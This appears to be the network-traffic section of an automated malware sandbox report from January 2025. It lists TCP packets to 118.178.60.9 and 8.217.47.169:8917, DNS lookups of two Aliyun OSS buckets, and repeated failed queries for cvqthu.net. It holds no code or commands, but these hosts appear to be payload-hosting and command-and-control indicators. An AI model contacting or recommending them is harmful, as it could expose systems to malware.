                                                                                          Jan 11, 2025 04:45:10.268383026 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.268403053 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.268452883 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.268460989 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.268476009 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.268517017 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.268521070 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.268575907 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.268603086 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.268642902 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.268678904 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.268687963 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.268728018 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.268732071 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.268752098 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.268820047 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.268829107 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.268909931 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.268913984 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.268974066 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.268981934 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.268985987 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.269037962 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.269042969 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.269081116 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.269097090 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.269123077 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.269128084 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.269179106 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.269205093 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.269283056 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.269284964 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.269337893 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.269342899 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.269382954 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.269401073 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.269406080 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.269418001 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.269469023 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.269489050 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.269506931 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.269575119 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.269579887 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.269634008 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.269639015 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.269705057 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.269707918 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.269717932 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.269778013 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.269804955 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.269814014 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.269865036 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.269887924 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.269895077 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.269931078 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.269937038 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.269989014 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.269994020 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.270056963 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.270081043 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.270133972 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.270138025 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.270206928 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.270229101 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.270230055 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.270239115 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.270297050 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.270313025 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.270322084 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.270396948 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.270411015 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.270478964 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.270487070 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.270490885 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.270566940 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.270571947 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.270586014 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.270627975 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.270642996 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.270662069 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.270668030 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.270735979 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.270762920 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.270762920 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.270771027 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.270826101 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.270832062 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.270899057 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.270908117 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.270910978 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.270941019 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.270963907 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.270998001 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.271007061 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.271012068 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.271055937 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.271075964 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.271090031 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.271096945 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.271155119 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.271161079 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.271225929 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.271229982 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.271241903 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.271256924 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.271339893 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.271342039 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.271356106 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.271408081 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.271414042 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.271486998 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.271490097 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.271533966 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.271555901 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.271568060 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.271573067 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.271589041 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.271610022 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.271641016 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.271655083 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.271747112 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.271753073 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.271807909 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.271821022 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.271838903 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.271873951 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.271898985 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.271908998 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.271927118 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.272006989 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.359461069 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.359554052 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.359612942 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.359633923 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.359667063 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.359683990 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.359693050 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.359718084 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.359769106 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.359792948 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.359800100 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.359821081 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.359857082 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.359869957 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.359900951 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.359906912 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.359919071 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.359956980 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.360008001 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.360009909 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.360040903 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.360059977 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.360085964 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.360117912 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.360125065 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.360150099 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.360166073 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.360205889 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.360224962 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.360230923 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.360282898 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.360287905 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.360358953 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.360456944 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.360541105 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.360543966 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.360569954 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.360615015 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.360620022 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.360670090 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.360706091 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.360729933 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.360779047 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.360780001 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.360801935 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.360847950 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.360872030 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.360877991 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.360905886 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.360955000 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.360960960 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.360976934 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.361010075 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.361022949 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.361063957 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.361068964 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.361152887 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.361267090 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.361325979 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.361330986 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.361346006 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.361413956 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.361418009 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.361438990 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.361515999 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.361521959 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.361565113 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.361802101 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.361867905 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.361887932 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.361892939 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.361922979 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.361979961 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.361987114 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.362034082 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.362037897 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.362047911 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.362113953 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.362137079 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.362188101 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.362209082 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.362210035 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.362219095 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.362237930 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.362265110 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.362267971 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.362272978 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.362330914 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.362380981 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.362385035 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.362464905 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.362524986 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.362565994 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.362601995 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.362607002 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.362689972 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:10.362940073 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:45:10.363017082 CET49985443192.168.2.9118.178.60.9
                                                                                          Jan 11, 2025 04:45:14.851054907 CET499878917192.168.2.98.217.47.169
                                                                                          Jan 11, 2025 04:45:14.856312037 CET8917499878.217.47.169192.168.2.9
                                                                                          Jan 11, 2025 04:45:14.856381893 CET499878917192.168.2.98.217.47.169
                                                                                          Jan 11, 2025 04:45:15.425167084 CET499878917192.168.2.98.217.47.169
                                                                                          Jan 11, 2025 04:45:15.430752039 CET8917499878.217.47.169192.168.2.9
                                                                                          Jan 11, 2025 04:45:38.582680941 CET6298153192.168.2.91.1.1.1
                                                                                          Jan 11, 2025 04:45:38.587698936 CET53629811.1.1.1192.168.2.9
                                                                                          Jan 11, 2025 04:45:38.587816000 CET6298153192.168.2.91.1.1.1
                                                                                          Jan 11, 2025 04:45:38.588871956 CET6298153192.168.2.91.1.1.1
                                                                                          Jan 11, 2025 04:45:38.593826056 CET53629811.1.1.1192.168.2.9
                                                                                          Jan 11, 2025 04:45:39.067940950 CET53629811.1.1.1192.168.2.9
                                                                                          Jan 11, 2025 04:45:39.070718050 CET6298153192.168.2.91.1.1.1
                                                                                          Jan 11, 2025 04:45:39.075870991 CET53629811.1.1.1192.168.2.9
                                                                                          Jan 11, 2025 04:45:39.075959921 CET6298153192.168.2.91.1.1.1
                                                                                          Jan 11, 2025 04:46:10.176007032 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:46:10.176079035 CET44349985118.178.60.9192.168.2.9
                                                                                          Jan 11, 2025 04:46:10.176132917 CET49985443192.168.2.9118.178.60.9
                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Jan 11, 2025 04:43:41.207650900 CET5072653192.168.2.91.1.1.1
                                                                                          Jan 11, 2025 04:43:41.519522905 CET53507261.1.1.1192.168.2.9
                                                                                          Jan 11, 2025 04:44:16.092442989 CET6075953192.168.2.91.1.1.1
                                                                                          Jan 11, 2025 04:44:16.567384005 CET53607591.1.1.1192.168.2.9
                                                                                          Jan 11, 2025 04:45:14.325987101 CET6314253192.168.2.91.1.1.1
                                                                                          Jan 11, 2025 04:45:14.335127115 CET53631421.1.1.1192.168.2.9
                                                                                          Jan 11, 2025 04:45:20.369538069 CET6340053192.168.2.91.1.1.1
                                                                                          Jan 11, 2025 04:45:20.379081011 CET53634001.1.1.1192.168.2.9
                                                                                          Jan 11, 2025 04:45:26.510795116 CET5705653192.168.2.91.1.1.1
                                                                                          Jan 11, 2025 04:45:26.520354986 CET53570561.1.1.1192.168.2.9
                                                                                          Jan 11, 2025 04:45:32.542709112 CET5371453192.168.2.91.1.1.1
                                                                                          Jan 11, 2025 04:45:32.552742958 CET53537141.1.1.1192.168.2.9
                                                                                          Jan 11, 2025 04:45:38.575167894 CET5554653192.168.2.91.1.1.1
                                                                                          Jan 11, 2025 04:45:38.582200050 CET53555461.1.1.1192.168.2.9
                                                                                          Jan 11, 2025 04:45:45.088474989 CET5120253192.168.2.91.1.1.1
                                                                                          Jan 11, 2025 04:45:45.098419905 CET53512021.1.1.1192.168.2.9
                                                                                          Jan 11, 2025 04:45:51.119652987 CET5753453192.168.2.91.1.1.1
                                                                                          Jan 11, 2025 04:45:51.128896952 CET53575341.1.1.1192.168.2.9
                                                                                          Jan 11, 2025 04:45:57.151330948 CET5282853192.168.2.91.1.1.1
                                                                                          Jan 11, 2025 04:45:57.160698891 CET53528281.1.1.1192.168.2.9
                                                                                          Jan 11, 2025 04:46:03.317244053 CET6253253192.168.2.91.1.1.1
                                                                                          Jan 11, 2025 04:46:03.351439953 CET53625321.1.1.1192.168.2.9
                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                          Jan 11, 2025 04:43:41.207650900 CET192.168.2.91.1.1.10x8437Standard query (0)662hfg.oss-cn-beijing.aliyuncs.comA (IP address)IN (0x0001)false
                                                                                          Jan 11, 2025 04:44:16.092442989 CET192.168.2.91.1.1.10xb39Standard query (0)22mm.oss-cn-hangzhou.aliyuncs.comA (IP address)IN (0x0001)false
                                                                                          Jan 11, 2025 04:45:14.325987101 CET192.168.2.91.1.1.10x45f7Standard query (0)cvqthu.netA (IP address)IN (0x0001)false
                                                                                          Jan 11, 2025 04:45:20.369538069 CET192.168.2.91.1.1.10xe357Standard query (0)cvqthu.netA (IP address)IN (0x0001)false
                                                                                          Jan 11, 2025 04:45:26.510795116 CET192.168.2.91.1.1.10x820aStandard query (0)cvqthu.netA (IP address)IN (0x0001)false
                                                                                          Jan 11, 2025 04:45:32.542709112 CET192.168.2.91.1.1.10x4758Standard query (0)cvqthu.netA (IP address)IN (0x0001)false
                                                                                          Jan 11, 2025 04:45:38.575167894 CET192.168.2.91.1.1.10x46b7Standard query (0)cvqthu.netA (IP address)IN (0x0001)false
                                                                                          Jan 11, 2025 04:45:38.588871956 CET192.168.2.91.1.1.10x1Standard query (0)cvqthu.netA (IP address)IN (0x0001)false
                                                                                          Jan 11, 2025 04:45:45.088474989 CET192.168.2.91.1.1.10xaaf5Standard query (0)cvqthu.netA (IP address)IN (0x0001)false
                                                                                          Jan 11, 2025 04:45:51.119652987 CET192.168.2.91.1.1.10x67a8Standard query (0)cvqthu.netA (IP address)IN (0x0001)false
                                                                                          Jan 11, 2025 04:45:57.151330948 CET192.168.2.91.1.1.10xdbe0Standard query (0)cvqthu.netA (IP address)IN (0x0001)false
                                                                                          Jan 11, 2025 04:46:03.317244053 CET192.168.2.91.1.1.10xdaf6Standard query (0)cvqthu.netA (IP address)IN (0x0001)false
                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                          Jan 11, 2025 04:42:54.171977043 CET1.1.1.1192.168.2.90x840aNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                          Jan 11, 2025 04:42:54.171977043 CET1.1.1.1192.168.2.90x840aNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                          Jan 11, 2025 04:43:41.519522905 CET1.1.1.1192.168.2.90x8437No error (0)662hfg.oss-cn-beijing.aliyuncs.comsc-2ixf.cn-beijing.oss-adns.aliyuncs.comCNAME (Canonical name)IN (0x0001)false
                                                                                          Jan 11, 2025 04:43:41.519522905 CET1.1.1.1192.168.2.90x8437No error (0)sc-2ixf.cn-beijing.oss-adns.aliyuncs.comsc-2ixf.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                                                                          Jan 11, 2025 04:43:41.519522905 CET1.1.1.1192.168.2.90x8437No error (0)sc-2ixf.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com39.103.20.105A (IP address)IN (0x0001)false
                                                                                          Jan 11, 2025 04:44:16.567384005 CET1.1.1.1192.168.2.90xb39No error (0)22mm.oss-cn-hangzhou.aliyuncs.comsc-29j7.cn-hangzhou.oss-adns.aliyuncs.comCNAME (Canonical name)IN (0x0001)false
                                                                                          Jan 11, 2025 04:44:16.567384005 CET1.1.1.1192.168.2.90xb39No error (0)sc-29j7.cn-hangzhou.oss-adns.aliyuncs.comsc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                                                                          Jan 11, 2025 04:44:16.567384005 CET1.1.1.1192.168.2.90xb39No error (0)sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com118.178.60.9A (IP address)IN (0x0001)false
                                                                                          Jan 11, 2025 04:45:14.335127115 CET1.1.1.1192.168.2.90x45f7Name error (3)cvqthu.netnonenoneA (IP address)IN (0x0001)false
                                                                                          Jan 11, 2025 04:45:20.379081011 CET1.1.1.1192.168.2.90xe357Name error (3)cvqthu.netnonenoneA (IP address)IN (0x0001)false
                                                                                          Jan 11, 2025 04:45:26.520354986 CET1.1.1.1192.168.2.90x820aName error (3)cvqthu.netnonenoneA (IP address)IN (0x0001)false
                                                                                          Jan 11, 2025 04:45:32.552742958 CET1.1.1.1192.168.2.90x4758Name error (3)cvqthu.netnonenoneA (IP address)IN (0x0001)false
                                                                                          Jan 11, 2025 04:45:39.067940950 CET1.1.1.1192.168.2.90x1Name error (3)cvqthu.netnonenoneA (IP address)IN (0x0001)false
                                                                                          Jan 11, 2025 04:45:45.098419905 CET1.1.1.1192.168.2.90xaaf5Name error (3)cvqthu.netnonenoneA (IP address)IN (0x0001)false
                                                                                          Jan 11, 2025 04:45:51.128896952 CET1.1.1.1192.168.2.90x67a8Name error (3)cvqthu.netnonenoneA (IP address)IN (0x0001)false
                                                                                          Jan 11, 2025 04:45:57.160698891 CET1.1.1.1192.168.2.90xdbe0Name error (3)cvqthu.netnonenoneA (IP address)IN (0x0001)false
                                                                                          Jan 11, 2025 04:46:03.351439953 CET1.1.1.1192.168.2.90xdaf6Name error (3)cvqthu.netnonenoneA (IP address)IN (0x0001)false
